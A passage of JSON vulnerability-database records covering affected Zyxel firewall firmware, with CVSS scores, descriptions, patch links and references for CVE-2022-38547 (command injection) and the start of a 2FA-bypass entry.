                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          }
        ]
      },
      "cve": "CVE-2022-38547",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2023-003229",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-38547",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-38547",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2023-003229",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202302-487",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A post-authentication command injection vulnerability in the CLI command of Zyxel ZyWALL/USG series firmware versions 4.20 through 4.72, VPN series firmware versions 4.30 through 5.32, USG FLEX series firmware versions 4.50 through 5.32, and ATP series firmware versions 4.32 through 5.32, which could allow an authenticated attacker with administrator privileges to execute OS commands. plural Zyxel The product has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-38547"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-38547",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-38547",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-38547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ]
      },
      "id": "VAR-202302-0865",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.2867630485714286
      },
      "last_update_date": "2023-12-18T13:26:45.600000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel\u00a0security\u00a0advisory\u00a0for\u00a0post-authentication\u00a0RCE\u00a0in\u00a0firewalls",
            "trust": 0.8,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-rce-in-firewalls"
          },
          {
            "title": "ZyXEL ZyWALL USG Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=225393"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/live-hack-cve/cve-2022-38547 "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-38547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-rce-in-firewalls"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-38547"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-38547/"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/live-hack-cve/cve-2022-38547"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-38547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-38547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-02-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-38547"
          },
          {
            "date": "2023-09-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "date": "2023-02-07T02:15:07.883000",
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "date": "2023-02-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-02-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-38547"
          },
          {
            "date": "2023-09-05T05:07:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          },
          {
            "date": "2023-02-14T23:45:41.760000",
            "db": "NVD",
            "id": "CVE-2022-38547"
          },
          {
            "date": "2023-02-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Zyxel\u00a0 In the product \u00a0OS\u00a0 Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-003229"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202302-487"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202205-1787

    Vulnerability from variot - Updated: 2023-12-18 13:22

    A downgrade from two-factor authentication to one-factor authentication vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.32 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, and VPN series firmware versions 4.32 through 5.21, that could allow an authenticated attacker to bypass the second authentication phase to connect the IPsec VPN server even though the two-factor authentication (2FA) was enabled.

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202205-1787",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg2200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 20w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg20",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
